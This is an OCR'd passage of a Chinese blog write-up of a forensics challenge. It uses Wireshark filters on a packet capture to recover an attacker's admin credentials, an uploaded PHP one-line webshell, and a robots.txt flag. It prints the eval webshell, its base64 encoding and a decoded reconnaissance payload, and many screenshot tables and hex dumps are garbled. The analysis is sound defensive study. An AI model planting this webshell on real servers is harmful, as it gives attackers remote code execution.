|       |              |                                        |                                          |             |                                              |                                                              |                               | -CSDN @tohoov 6 |
| 0 2   | HIML Form UR | KL Encoded (urlencoded-f               | iorm), 72 字节                             |             |                                              |                                                              | 分组: 736029 · 已显示: 2500 (0.3%) | 就畫: Défait      |
|       |              |                                        |                                          |             |                                              |                                                              |                               |                 |

由于通过过滤之后,仍存在众多 302重定向 登陆的流量,逐一进行追踪TCP流这种方法不现实,因此根据其它大师以往的经验, 直接追踪最后一个流量的TCP流(一般黑客成功登录到需要的后台,就不会继续),如果查询出是 302重定向,那么此流量所提 交的表单中就有我们所需要的账号和密码。

| 🧲 Wireshark ·追踪 TCP 流 (tcp.stream eq 71841) · webone.pcap    | -       |         | ×   |
|--------------------------------------------------------------|---------|---------|-----|
| POST /admin/login.php?rec=login HTTP/1.1                     |         |         |     |
| Host: 192.168.32.189                                         |         |         |     |
| Connection: keep-alive                                       |         |         |     |
| Content-Length: 72                                           |         |         |     |
| Cache-Control: max-age=0                                     |         |         |     |
| Origin: http://192.168.32.189                                |         |         |     |
| Upgrade-Insecure-Requests: 1                                 |         |         |     |
| Content-Type: application/x-www-form-urlencoded              |         |         |     |
| User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleW | ebKit/5 | 37.36   |     |
| (KHTML, like Gecko) Chrome/67.0.3396.62 Safari/537.36        |         |         |     |
| Accept: text/html,application/xhtml+xml,application/xml;q=0. | 9,image | 1       |     |
| webp,image/apng,*/*;q=0.8                                    |         |         |     |
| Referer: http://192.168.32.189/admin/login.php               |         |         |     |
| Accept-Encoding: gzip, deflate                               |         |         |     |
| Accept-Language: zh-CN,zh;q=0.9                              |         |         |     |
| Cookie: PHPSESSID=am29gr8kthd+cgbaoee+pggv/4                 |         |         |     |
| user_name=admin&password=admin%21%40%23pass123&submit=%E7%99 | %BB%E5% | BD%95H  | ТТР |
| /1.1 302 Found                                               |         |         |     |
| Date: Wed, 08 Aug 2018 08:11:45 GMT                          |         |         |     |
| Server: Apache/2.2.15 (CentOS)                               |         |         |     |
| X-Powered-By: PHP/5.4.45                                     |         |         |     |
| Expires: Fri, 14 Mar 1980 20:53:00 GMT                       |         |         |     |
| Cache-Control: no-cache, must-revalidate                     |         |         |     |
| Pragma: no-cache                                             |         |         |     |
| Last-Modified: Wed, 08 Aug 2018 08:11:45 GMT                 |         |         |     |
| Location: http://192.168.32.189/admin/index.php              |         |         |     |
| Content-Length: 0                                            |         |         |     |
| Connection: close                                            |         |         |     |
| Content-Type: text/html; charset=utf-8                       |         |         |     |
|                                                              |         |         |     |
|                                                              |         |         |     |
|                                                              |         |         |     |
|                                                              |         |         |     |
|                                                              |         |         |     |
| -<br>分組 733517。1 客户端 分組,1 服务器 分組,1 turn(s).点击选择。             |         |         |     |
| 整个对话 (1090 bytes) ~ 显示和保存数据为 ASC                             | II ~    | 流 71841 | -   |
| 查找:                                                          | 1       | 查找下一个   | (N) |
| 滤掉此流 打印 Save as ··· 返回 C ···                                 | 5D11 @  | lohhh   | y.G |
|                                                              |         |         |     |

可以看到最后一个流量是 302重定向,通过前面一张图可得知黑客登陆web后台所使用的账号密码是 (admin/admin!@#pass123)

### 4、黑客上传的webshell文件名、内容以及内容的base编码

webshell也就是一句话木马,而通常一句话木马的样式为 <?php @eval(\$\_POST['pass']); ?>。 先通过过滤语句进行过滤。

#### http.request.method=="POST" and ip.src==192.168.94.59 and http

| / wok                                                                                               |                                                                                                    |                                                                                                    |                                                                                                    |                                                                                                    | - <b>a</b> ×                                                       |
|----------------------------------------------------------------------------------------------------|----------------------------------------------------------------------------------------------------|----------------------------------------------------------------------------------------------------|----------------------------------------------------------------------------------------------------|----------------------------------------------------------------------------------------------------|--------------------------------------------------------------------|
|                                                                                                    | anterpeap                                                                                                    |                                                                                                    | ()たい (か)よい) 中)ぎの                                                                                                    |                                                                                                    |                                                                    |
| ×1+(r)                                                                                              | 1 96884(C) 100                                                                                                    | (V) 20049(C) 3469+(C)                                                                                                    | ガサT(A) 卵をTT(S) 电油(Y)                                                                                                    | vv)(i) ====================================                                                                                                    |                                                                    |
| A                                                                                                   |                                                                                                    | - X - Y                                                                                                    | ≌ % ⊻ ⊒ ⊒ ⊄ ⊄                                                                                                    |                                                                                                    |                                                                    |
| http                                                                                                | , request, metho                                                                                                    | od="POST" and ip. src=1                                                                                                    | 92.168.94.59 and http                                                                                                    |                                                                                                    | ▲ 二 ● 表达式… +                                                       |
| No.                                                                                                 | Time                                                                                                    | Source                                                                                                    | Bestination                                                                                                    | iorol Length Info                                                                                                    |                                                                    |
| 75                                                                                                  | 5/69./16.                                                                                                    | 192.100.94.59                                                                                                    | 192.100.32.109                                                                                                    | P 654 POST /admin/cloud.php?rec=update_numper niP/1.1 (application/x-www-torm-urlencode<br>254 POST /admin/cloud.php?rec=update_numper niP/1.1 (application/x-www-torm-urlencode) |                                                                    |
| 75                                                                                                  | 5017.705.                                                                                                    | 192.100.94.59                                                                                                    | 192.100.32.109                                                                                                    | P 754 POST /admin/login.php?rec=login http://liaphication/x-www-form-uriencoded) C42 POST /admin/login.php?rec=login http://liaphication/x-www-form-uriencoded)                   |                                                                    |
| / 2                                                                                                 | 5035.009.                                                                                                    | 192.100.94.59                                                                                                    | 192.100.32.109                                                                                                    | P 645 POST /admin/cloud.php?rec=update_number niP/1.1 (application/x-www-torm-urlencode<br>21 2005 (intersection) (intersection) (intersection) (intersection) (intersection)     | (d)                                                                |
| 72                                                                                                  | 5950.057.                                                                                                    | 192.100.94.59                                                                                                    | 192.100.32.109                                                                                                    | P /SI POST /images/article/a.php HTTP/1.1 (application/x.www-torm-uniencoded)                                                                                                    |                                                                    |
| 73                                                                                                  | 59/1 3//                                                                                                    | 192.108.94.59                                                                                                    | 192.100.32.109                                                                                                    | P 795 POST /images/article/a.php HTTP/1.1 (application/x-www-form-unlencoded)                                                                                                    |                                                                    |
| 73                                                                                                  | 5982 587                                                                                                    | 192.108.94.59                                                                                                    | 192.108.32.189                                                                                                    | P /53 POST /images/article/a.php HTTP/1.1 (application/x-www-form-unlencoded)                                                                                                    |                                                                    |
| 73                                                                                                  | 5992.007.                                                                                                    | 192.108.94.59                                                                                                    | 192.108.32.189                                                                                                    | P 779 POST /images/article/a.php HTTP/1.1 (application/x-www-form-unlencoded)                                                                                                    |                                                                    |
| 73                                                                                                  | 5992.026                                                                                                    | 192 168 94 59                                                                                                    | 192.168 32 189                                                                                                    | P 779 POST / images/article/a php HTTP/11 (application/x-www-form-unlencoded)                                                                                                    |                                                                    |
| 73                                                                                                  | 6004 768                                                                                                    | 192 168 94 59                                                                                                    | 192.168 32 189                                                                                                    | P 761 POST / images/article/a nhn HTTP/11 (annlication/x-www.form.urlencoded)                                                                                                    |                                                                    |
| 73                                                                                                  | 6006 278                                                                                                    | 192 168 94 59                                                                                                    | 192.168 32 189                                                                                                    | P 761 POST / images/article/a nhn HTTP/11 (annlication/x-www.form.urlencoded)                                                                                                    |                                                                    |
| 7.5                                                                                                 | C000 454                                                                                                    | 402 400 04 50                                                                                                    | 402 400 32 400                                                                                                    | D 734 DOCT // / / / / / / / / / / / / / / / / /                                                                                                     | v                                                                  |
| > Etf<br>> Int<br>> Tra<br>> [2<br>> Hyp<br>> HTN<br>>                                              | ernet II, s<br>cernet Prote<br>ansmission (<br>Reassemble<br>pertext Train<br>NL Form URL<br>Form item:                                                                                                    | Src: Hangzhou_39:4<br>ocol Version 4, Sr<br>Control Protocol,<br>d TCP Segments (92<br>nsfer Protocol<br>Encoded: applicat<br>"1234" = "@eval@(                                                                                                    | <pre>l2:ed (b0:f9:63:39:42:e<br/>c: 192.168.94.59, Dst:<br/>Src Port: 12855, Dst f<br/>22 bytes): #733930(245)<br/>:ion/x-www-form-urlence<br/>base64_decode(\$_POST[a</pre> | Dst: Vmare_cb9f:85 (08:0c:29:cb:9f:85)<br>1.68.32.189<br>80, Seq: 246, Ack: 1, Len: 677<br>33932(677)]                                                                            |                                                                    |
|                                                                                                    |                                                                                                    |                                                                                                    |                                                                                                    |                                                                                                    |                                                                    |
| <                                                                                                   |                                                                                                    |                                                                                                    |                                                                                                    |                                                                                                    | >                                                                  |
| 0000<br>0010<br>0020<br>0030<br>0040<br>0050<br>0060<br>0050<br>0050<br>0090<br>0090<br>0090<br>009 | 00         0c         29           02         cd         23           20         bd         32           00         44         36           01         28         62           24         54         58           36         5a         58           73         61         57           30         58         32           6c         63         31           70         4f         32           43         49         70 | $ \begin{array}{c} {\rm cb} \ 97 \ 85 \ b0 \ 79 \ 65 \\ {\rm cf} \ 40 \ 80 \ 77 \ 66 \ d\\ {\rm 37} \ 60 \ 50 \ 87 \ b4 \ 1 \\ {\rm 15} \ 60 \ 80 \ 87 \ b4 \ 1 \\ {\rm 15} \ 60 \ 80 \ 87 \ b4 \ 51 \\ {\rm 15} \ 60 \ 80 \ 87 \ b4 \ 51 \\ {\rm 15} \ 54 \ 5b \ 51 \ 65 \\ {\rm 16} \ 53 \ 54 \ 5b \ 61 \ 65 \\ {\rm 16} \ 53 \ 54 \ 5b \ 61 \ 65 \\ {\rm 16} \ 53 \ 74 \ 69 \ 64 \ 52 \ 76 \\ {\rm 14} \ 79 \ 62 \ 33 \ 44 \ 73 \ 42 \ 73 \ 54 \ 55 \ 52 \ 65 \\ {\rm 16} \ 63 \ 52 \ 52 \ 52 \ 52 \ 52 \ 52 \ 52 \ 5$ | $\begin{array}{cccccccccccccccccccccccccccccccccccc$                                                                                                    | )c88E.<br>#@                                                                                                    | ~                                                                  |
| Frane                                                                                               | (731 bytes)<br>webone.pcap                                                                                                    | Reassembled TCP (922 b                                                                                                    | ytes)                                                                                                    |                                                                                                    | 分组: 736029 ・已显示: 3303 (0.4%) CSDN (回) (11010円 (日本)<br>開催: Diefault |

通过漫长而又无聊的翻阅流量后,发现了一处存在疑点(图片上传功能上传了一堆a.php文件(一般不会在上传图片中上传PHP 文件),此时可以猜测有可能是黑客通过图片上传功能上传木马。

通过追踪TCP流,发现类似一句话木马的样式 @eval.(base64\_decode(\$\_POST[action])),确认这就是一句话木马。

| 🚄 Wireshark · 追踪 TCP 流 (tcp.stream eq 71865) · webone.pcap                                                                                                    | -                                                                                                    |                                                                                        | ×                                                    |
|----------------------------------------------------------------------------------------------------|----------------------------------------------------------------------------------------------------|----------------------------------------------------------------------------------------|------------------------------------------------------|
| <pre>POST /images/article/a.php HTTP/1.1<br/>User-Agent: Java/1.8.0_171<br/>Host: 192.168.32.189<br/>Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2<br/>Connection: keep-alive<br/>Content-type: application/x-www-form-urlencoded<br/>Content-Length: 677<br/>1234=@eval</pre>                                                                                                    |                                                                                                    |                                                                                        |                                                      |
| <pre>(base64_decode(\$_POST[action]));&amp;action=QGluaV9zZXQoImRpc3BsY)<br/>MCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ21jX3F1b3Rlc19ydW50aW<br/>Ii0%2BfCIpOzskRD1kaXJuYW11KCRfU0VSVkVSWyJTQ1JJUFRfRk1MRU5BTUUJ<br/>IiKSREPWRpcm5hbWUoJF9TRVJWRVJbI1BBVEhfVFJBT1NMQVRFRCJdKTskUj0j<br/>hzdWJzdHIoJEQsMCwxKSE9Ii8iKXtmb3J1YWNoKHJhbmd1KCJBIiwiWiIpIGFz<br/>RpcigieyRMfToiKSkkUi49InskTH06Ijt9JFIuPSJcdCI7JHU9KGZ1bmN0aW9u<br/>9zaXhfZ2V0ZWdpZCcpKT9AcG9zaXhfZ2V0cHd1aWQoQHBvc214X2d1dGV1aWQc<br/>0oJHUpPyR1WyduYW11J106QGd1dF9jdXJyZW50X3VzZXIoKTskUi49CGhwX3Vu<br/>IoeyR1c3J9KSI7cHJpbnQgJFI702VjaG8oInw8LSIp02RpZSgp0w%3D%3DHTTF<br/>Date: Wed, 08 Aug 2018 08:13:44 GMT<br/>Server: Apache/2.2.15 (CentOS)<br/>X-Powered-By: PHP/5.4.45</pre> | (1fZXJ)<br>/11KDA<br>/XSk7al<br>/2XSk7al<br>/2CRMKI<br>/22V4a)<br>/X2V4a)<br>/XSk6J<br>/YW11K(<br>//1.1 | yb3JzI<br>pO2Vja<br>NYoJEQ<br>Vx0Ijt<br>VlmKG1<br>XN0cyg<br>yc7JHV<br>Ck7JFI<br>200 OK | iwi<br>G8o<br>9PS<br>pZi<br>zX2<br>ncG<br>zcj<br>uPS |

| Content-Length: 140<br>Connection: close<br>Content-Type: text/html; charset=UTF-8                                        | 8                                              |
|----------------------------------------------------------------------------------------------------|------------------------------------------------|
| <pre>-&gt; /var/www/html/images/article<br/>localhost.localdomain 2.6.32-504.23.4<br/>UTC 2015 x86_64(apache) &lt;-</pre> | Linux<br>.el6.x86_64 #1 SMP Tue Jun 9 20:57:37 |
|                                                                                                    |                                                |
|                                                                                                    |                                                |
| 2 客户端 分组, 1 服务器 分组, 1 turn(s).                                                                                            |                                                |
| 整个对话(1256 bytes)                                                                                                    | ✓ 显示和保存数据为 ASCII ✓ 流 71865 -                   |
| 查找:                                                                                                    | 查找下一个(N)                                       |
| 滤掉此流 打印                                                                                                    | Save as*** 返回 CSD科 @Joh将科y.G                   |

通过上图得出1234为传递值,并有base64加密过的内容,通过解密(注:%2B是+,需要更换后才能成功解密)。

QG1uaV9zZXQoImRpc3BsYX1fZXJyb3JzIiwiMCIp00BzZXRfdG1tZV9saW1pdCgwKTtAc2V0X21hZ21jX3F1b3R1c19ydW50aW11KDAp02VjaG8oIi0<mark>%2</mark> fCIp0zskRD1kaXJuYW11KCRfU0VSVkVSWyJTQ1JJUFRfk1MRU5BTUUiXSk7aWYoJEQ9PSIiKSREPWRpcm5hbWuoJF9TRVJWRVJbI1BBVEhfVFJBT1NM QVRFRCJdKTskUj0ieyREfVx0IjtpZihzdWJzdHIoJEQsMCwxKSE9Ii8iKXtmb3J1YWNoKHJhbmd1KCJBIiwiWiIpIGFzICRMKW1mKG1zX2RpcigieyRMf ToiKSkkUi49InskTH06Ijt9JFIuPSJcdCI7JHU9KGZ1bmN0aW9uX2V4aXN0cygncG9zaXhfZ2V0ZWdpZCcpKT9AcG9zaXhfZ2V0cHd1aWQoQHBvc214X2 d1dGV1aWQoKSk6Jyc7JHVzcj0oJHUpPyR1WyduYW11J106QGd1dF9jdXJyZW50X3VzZXIoKTskUi49cGhwX3VuYW11KCk7JFIuPSIoeyR1c3J9KSI7cHJ pbnQgJFI702VjaG8oInw8LSIp02RpZSgpOw

清空 │加密 │解密 │□解密为UTF-8字节流

CSDN @Johnny.G

通过解密发现是php代码。

QG1uaV9zZXQoImRpc3BsYX1fZXJyb3JzIiwiMCIp00BzZXRfdG1tZV9saW1pdCgwKTtAc2V0X21hZ21jX3F1b3R1c19ydW50aW11KDAp02VjaG8oIi0<mark>+</mark>f CIp0zskRD1kaXJuYW11KCRfU0VSVkVSWyJTQ1JJUFRfRk1MRU5BTUUiXSk7aWYoJEQ9PSIiKSREPWRpcm5hbWUoJF9TRVJWRVJb11BBVEhfVFJBT1NMQV RFRCJdKTskUj0ieyREfVx0IjtpZihzdWJzdHIoJEQsMCwxKSE9Ii8iKXtmb3J1YWNoKHJhbmd1KCJBIiwiWiIpIGFzICRMKW1mKG1zX2RpcigieyRMfTo iKSkkUi49InskTH06Ijt9JFIuPSJcdCI7JHU9KGZ1bmN0aW9uX2V4aXN0cygncG9zaXhfZ2V0ZWdpZCcpKT9AcG9zaXhfZ2V0cHd1aWQoHBvc214X2d1 dGV1aWQoKSk6Jyc7JHVzcj0oJHUpPyR1WyduYW11J106QGd1dF9jdXJyZW50X3VzZXIoKTskUi49cGhwX3VuYW11KCk7JFIuPSIoeyR1c3J9KSI7cHJpb nQgJFI702VjaG8oInw8LSIp02RpZSgpOw

#### 清空 || 加密 || 解密 | □ 解密为UTF-8字节流

| @ini_set("display_errors", "0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("-                            |
|----------------------------------------------------------------------------------------------------|
| > ");;\$D=dirname(\$_SERVER["SCRIPT_FILENAME"]);if(\$D=="")\$D=dirname(\$_SERVER["PATH_TRANSLATED"]);\$R="         |
| {\$D}\t";if(substr(\$D,0,1)!="/"){foreach(range("A", "Z") as \$L)if(is_dir("{\$L}:"))\$R.="{\$L}:";}\$R.="\t";\$u= |
| (function_exists('posix_getegid'))?@posix_getpwuid(@posix_geteuid()):'';\$usr=(\$u)?                               |
| \$u['name']:@get_current_user();\$R.=php_uname();\$R.="({\$usr})";print \$R;;echo(" <-");die();                    |
|                                                                                                    |

CSDN @Johnny.G

通过发现基本可以断定一句话木马是使php编写的,此时决定再次通过过滤语句进行过滤。

| ▲webone.pcap<br>マセルド 電磁(F) 初間(V) 製味(G) 建石(G) 分析(A) たけくS) 田氏(V) 干燥(V) 下貫(F) 軽数(H) | - ø ×                                            |
|----------------------------------------------------------------------------------|--------------------------------------------------|
|                                                                                  |                                                  |
| http contains "("php @eval")                                                     | 🗙 🛶 💌 🎽 表达式 🔸                                    |
| Bo. Time Source Pertination Protocol Length Info                                 |                                                  |
|                                                                                  |                                                  |
|                                                                                  | 6SBH-@Johnv.G                                    |
| \varTheta 🗹 webone, pcsp                                                         | 分组: 736029 ・ 己显示: 0 (0.0%) 000011 (日) 謝益: 166334 |

通过上面的过滤语句过滤,并没有发现数据,考虑到可能是tcp重传的原因,导致http中没追踪到,因此尝试将http换成tcp进行再 次过滤。

| tcp contains " php @eval"</th <th></th> <th></th>                                                                                                    |                            |                                        |
|----------------------------------------------------------------------------------------------------|----------------------------|----------------------------------------|
|                                                                                                    |                            |                                        |
|                                                                                                    |                            |                                        |
|                                                                                                    |                            |                                        |
| ▲ webconsepcap<br>文化氏の 金属氏 10階以の 脚体(G) 条件(A) 修作(A) 使法(Y) 电法(Y) 工具(F) 解剖(H)                                                                                                    |                            | - 0 ×                                  |
|                                                                                                    |                            |                                        |
| () eponetinis "dynh wend"<br>So. Tise Source Distinguise Protocol Learth Info                                                                                                    |                            | ▲□□▼ 表达式… +                            |
| 73. 5867.018.102.108.04.59 192.168.34.59 192.168.32.189 TCP 1514 [TCP Retransmission] 12716 - 88 [PSH, ACK] Seq-5677 Ack-1 Min-12408 Len-1460                                                                                                    |                            |                                        |
| 22 20011000 1211201 271200 1211200 101 1220 [101 10218181811100] 11120 - 00 [Noc] 36[-300 Noc1-1 800-1000 201-100                                                                                                    |                            |                                        |
|                                                                                                    |                            |                                        |
|                                                                                                    |                            |                                        |
|                                                                                                    |                            |                                        |
|                                                                                                    |                            |                                        |
| > Frame 733793: 1514 bytes on wire (12112 bits). 1514 bytes cantured (12112 bits)                                                                                                    |                            |                                        |
| ) Ethernet II, Src: Hangzhou 39:42;ed (00:F9:63:39:42;ed), 05:: Wmare_cb:9F:85 (00:6c:29:cb:9F:85)<br>> Tehernet Destroch Verschen d. Sec. 100:152:04:50, 05:10:100:100:100:100:000                                                                                                    |                            |                                        |
| 2 Internet (FOCKOL VETSUN 4), 30(-1), 30(-1), |                            |                                        |
|                                                                                                    |                            |                                        |
|                                                                                                    |                            |                                        |
|                                                                                                    |                            |                                        |
|                                                                                                    |                            |                                        |
|                                                                                                    |                            |                                        |
|                                                                                                    |                            |                                        |
|                                                                                                    |                            |                                        |
| 0000 00 0c 29 ch 95 85 h0 f9 63 39 42 ed 08 00 45 00                                                                                                    |                            | ^                                      |
| 0010 05 dc 19 0d 40 00 7f 66 dc c5 c6 a8 5s 1b c0 a8, 49                                                                                                    |                            |                                        |
| 0030 00 44 85 3d 00 00 6c 65 2d 68 65 69 67 68 74 3a Dne height:<br>0040 32 30 25 3h 66 f6 6e 74 2d 66 16 6f 96 7c                                                                                                    |                            |                                        |
| 0050 3a e5 ae 8b e4 bd 93 3b 66 6F 6e 74 2d 73 69 7a :; font-siz                                                                                                    |                            |                                        |
| 9070 90 bd e5 ac 9e e6 8a a2 e4 bf ar e4 ba ba e5 91                                                                                                    |                            |                                        |
| 20 73 74 79 6c 65 34 22 6c 69 6e 65 24 68 65 69 style="line-hei<br>0000 67 68 74 3a 32 30 25 3b 66 fc 64 74 24 66 in cht:2004; font-fa                                                                                                    |                            |                                        |
| 0000 6d 69 6c 79 3a 63 61 6c 69 62 72 69 3b 66 6f 6e millycal brijfon<br>0000 74 2d 73 69 7a 65 3a 13 67 87 8b 22 3a 31 3 t-siperi box: >13                                                                                                    |                            |                                        |
| 9000 30 30 32 2£ 73 78 61 6e 3e 3c 73 70 61 6e 20 73 90 4(xpan xxpan s<br>9000 74 79 6 65 3d 22 6 69 6e 55 24 68 65 96 67 84 xvle="in-heid"                                                                                                    |                            |                                        |
| 90479 74 3a 32 30 30 25 3b 66 6f 6e 74 2d 66 6i 6d 69 t:20083;f ont-fami<br>9109 6c 79 3a 65 as 8b ed bd 93 3b 66 f6 6f 42 47 37 1/v::font-s                                                                                                    |                            | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ |
| 🔵 🗶 webane peup                                                                                                    | 分组: 736029 · 已显示: 2 (0.0%) | CSDN @Jonny G                          |
|                                                                                                    |                            |                                        |
|                                                                                                    |                            |                                        |

发现查询出了结果,此时选取第二个流量追踪TCP流。

| 🚄 Wireshark · 追踪 TCP 流 (tcp.stream eq 71859) · webone.pcap | _ | $\times$ |
|------------------------------------------------------------|---|----------|
| 16px;">                                                    |   | <br>^    |

| ······································                         |          |
|----------------------------------------------------------------|----------|
|                                                                |          |
|                                                                |          |
| chn /s                                                         |          |
|                                                                |          |
| WebKitEormBoundaryUTPbEBT1i473BL00                             |          |
| Content_Disposition: form_data: name="image": filename="1 nhn" |          |
| Content-Type: application/octet-stream                         |          |
| content typer application, occer ser cam                       |          |
| <pre><?php @eval(\$ POST[1234]):?></pre>                       |          |
| WebKitFormBoundaryUIPbEBT1i473BL00                             |          |
| Content-Disposition: form-data; name="keywords"                |          |
|                                                                |          |
|                                                                |          |
| WebKitFormBoundaryUIPbEBT1j473BL00                             |          |
| Content-Disposition: form-data; name="description"             |          |
|                                                                |          |
|                                                                |          |
| WebKitFormBoundaryUIPbEBT1j473BL00                             |          |
| Content-Disposition: form-data; name="token"                   |          |
|                                                                |          |
|                                                                |          |
| WebKitFormBoundaryUIPbEBT134/3BL00                             |          |
| Content-Disposition: form-data; name="image"                   |          |
| imagos/anticle/a ppg                                           |          |
| WebKitEormBoundervUTPbERT1i473BL00                             |          |
| Content-Disposition: form-data: name="id"                      |          |
|                                                                |          |
| 10                                                             |          |
| WebKitFormBoundaryUIPbEBT1j473BL00                             |          |
| Content-Disposition: form-data; name="submit"                  |          |
| · · · ·                                                        | <b>~</b> |
| 5 客户端 分组, 2 服务器 分组, 1 turn(s).                                 |          |
| 整个对话(10 kB)      显示和保存数据为     ASCII      次     71859           | ÷        |
| 查找: 查找下一个()                                                    | I)       |
|                                                                | -        |
| 溶掉IC流 打印 Save as IX回 C3中种 @J0 打响水                              | Ĵ.       |

最后得出:

文件名为: a.php 内容为:

<?php @eval(\$\_POST[1234]);?>
-----WebKitFormBoundaryUIPbEBT1j473BL00
Content-Disposition: form-data; name="keywords"

内容的base编码为:

PD9waHAgQGV2YWwoJF9QT1NUWzEyMzRdKTs/Pg==

# 5、黑客找到的robots.txt中的flag

根据题目的要求,先通过过滤语句过滤。

http contains "robots.txt"

| 🚄 webo       | ne.pcap     |                   |                   |            |                                                            | – o ×                                 |   |
|--------------|-------------|-------------------|-------------------|------------|------------------------------------------------------------|---------------------------------------|---|
| 文件(F)        | 编辑(E) 1     | 规图(V) 跳转(G) 捕获(C) | 分析(A) 统计(S) 电话(Y) | 无线(W)      | (T) 帮助(H)                                                  |                                       |   |
| <b>X H</b> . | 1 🛛 🔤       | 🛅 🔀 🖸 । ९ 👄 👄 🕾   | T 🛓 📃 📃 Q, Q,     | Q, 🎹       |                                                            |                                       |   |
| 📕 http       | contains "r | obots. txt"       |                   |            |                                                            | 🛛 📼 💌 表达式…                            | ÷ |
| No.          | Time        | Source            | Bestination       | Protocol I | th Info                                                    |                                       | ^ |
|              | 2920.91     | 1 192.168.94.59   | 192.168.32.189    | HTTP       | 36 GET /robots.txt HTTP/1.1                                |                                       |   |
| 54           | 2922.60     | 3 192.168.94.59   | 192.168.32.189    | HTTP       | 83 GET /sitemap.xml.gz HTTP/1.1                            |                                       |   |
| 54           | 2922.60     | 3 192.168.94.59   | 192.168.32.189    | HTTP       | 80 GET /sitemap.xml HTTP/1.1                               |                                       |   |
| 43           | 3961.75     | 9 192.168.94.59   | 192.168.32.189    | HTTP       | 93 GET /robots.txt HTTP/1.1                                |                                       |   |
| 43           | 3961.79     | 8 192.168.94.59   | 192.168.32.189    | HTTP       | 93 GET /robots.txt HTTP/1.1                                |                                       | 1 |
| 43           | 3961.80     | 8 192.168.94.59   | 192.168.32.189    | HTTP       | 63 GET http://192.168.32.189:80/robots.txt HTTP/1.1        |                                       |   |
| 43           | 3961.81     | 7 192.168.94.59   | 192.168.32.189    | HTTP       | V48 GET http://192.168.32.189:80/robots.txt HTTP/1.1       | · · · · · · · · · · · · · · · · · · · |   |
| 64           | 4456.56     | 3 192.168.94.59   | 192.168.32.189    | HTTP       | 194 GET /robots.txt HTTP/1.1                               |                                       |   |
| 64           | 4461.29     | 1 192.168.94.59   | 192.168.32.189    | HTTP       | 194 [TCP Spurious Retransmission] GET /robots.txt HTTP/1.1 |                                       |   |

| 27 AFAT FAT AAT AZA AZA AZA AZA TATATA TATATA TATATATA                                                                                                    |                                 | v               |
|----------------------------------------------------------------------------------------------------|---------------------------------|-----------------|
| > Frame 4048: 336 bytes on wire (2688 bits), 336 bytes captured (2688 bits)                                                                                                    |                                 |                 |
| > Ethernet II, Src: Hangzhou 39:42:ed (b0:f9:63:39:42:ed), Dst: Vmware cb:9f:85 (00:0c:29:cb:9f:85)                                                                                                    |                                 |                 |
| > Internet Protocol Version 4, Src: 192.168.94.59, Dst: 192.168.32.189                                                                                                    |                                 |                 |
| > Transmission Control Protocol, Src Port: 1138. Dst Port: 80. Sea: 1. Ack: 1. Len: 282                                                                                                    |                                 |                 |
| > Hypertext Transfer Protocol                                                                                                    |                                 |                 |
|                                                                                                    |                                 |                 |
|                                                                                                    |                                 |                 |
|                                                                                                    |                                 |                 |
|                                                                                                    |                                 |                 |
|                                                                                                    |                                 |                 |
|                                                                                                    |                                 |                 |
|                                                                                                    |                                 |                 |
|                                                                                                    |                                 |                 |
|                                                                                                    |                                 |                 |
|                                                                                                    |                                 |                 |
|                                                                                                    |                                 |                 |
|                                                                                                    |                                 |                 |
|                                                                                                    |                                 |                 |
|                                                                                                    |                                 |                 |
| 0000 00 0c 29 cb 9f 85 b0 f9 63 39 42 ed 08 00 45 00 ······· c9B···E·                                                                                                    |                                 | ^               |
| 0010 01 42 6c 9a 40 00 7f 06 8d d2 c0 a8 5e 3b c0 a8 .Bl @·····^;··                                                                                                    |                                 |                 |
| 20 bd 04 72 00 50 9d d8 f5 73 bd 05 c0 b8 50 18 ····P···s···P·                                                                                                    |                                 |                 |
| 0030 00 44 38 da 00 00 47 45 54 20 2f 72 6f 62 6f 74 - D8···GE T /robot                                                                                                    |                                 |                 |
| 0040 73 2e 74 78 74 20 48 54 54 50 2f 31 2e 31 0d 0a s.txt HT TP/1.1.                                                                                                    |                                 |                 |
| 0050 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 Pragma: no-cache                                                                                                    |                                 |                 |
| 0060 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a ··Cache- Control:                                                                                                    |                                 |                 |
| 0070 20 6e 6f 2d 63 61 63 68 65 0d 0a 48 6f 73 74 3a no-cach e Host:                                                                                                    |                                 |                 |
| 0080 20 31 39 32 2e 31 36 38 2e 33 32 2e 31 38 39 0d 192.168 .32.189                                                                                                    |                                 |                 |
| 0090 0a 43 6f 6e 6e 65 63 /4 69 6f 6e 3a 20 4b 65 65 - Connect ion: Kee                                                                                                    |                                 |                 |
| 00 2d bi bc b9 /b bb 0d 0a 41 b3 b3 b3 /0 /4 2d p-alive Accept-                                                                                                    |                                 |                 |
| 40000 45 be 65 bt 64 b5 be 67 38 20 b7 /8 b7 /0 20 b7 /0 20 b7 /0 |                                 |                 |
| 0000 05 00 05 01 /4 05 00 08 35 /3 05 /2 20 41 0/ 05 efiate·· User-Age                                                                                                    |                                 |                 |
| 0000 0E /4 38 20 40 0T /8 09 0C 0C 0I 2T 33 2E 30 20 11: FWOLL 118/3-0                                                                                                    |                                 |                 |
| 0000 20 3/ 05 00 04 07 // /3 20 40 34 20 30 20 31 30 (Williams 10 0.1)                                                                                                    |                                 |                 |
| 0010 20 J 41 J J 50 J 42 Z 20 41 / 0 / 0 (0 J J 0 5) 0 Z WWWH A PAPLEMED                                                                                                    |                                 | 2               |
| 2 2 4 5 7 4 2 5 5 5 5 5 5 5 5 2 5 2 2 2 40 40 54 40 KL(557, 21 (NTH)                                                                                                    | ()(R. 200000                    | CSDN @Jglanny.G |
| Vecone.poap                                                                                                    | 773H. (30029 * EEA),: 17 (0.0%) | 自t五: Default    |
|                                                                                                    |                                 |                 |

追踪第一个流量的TCP流。

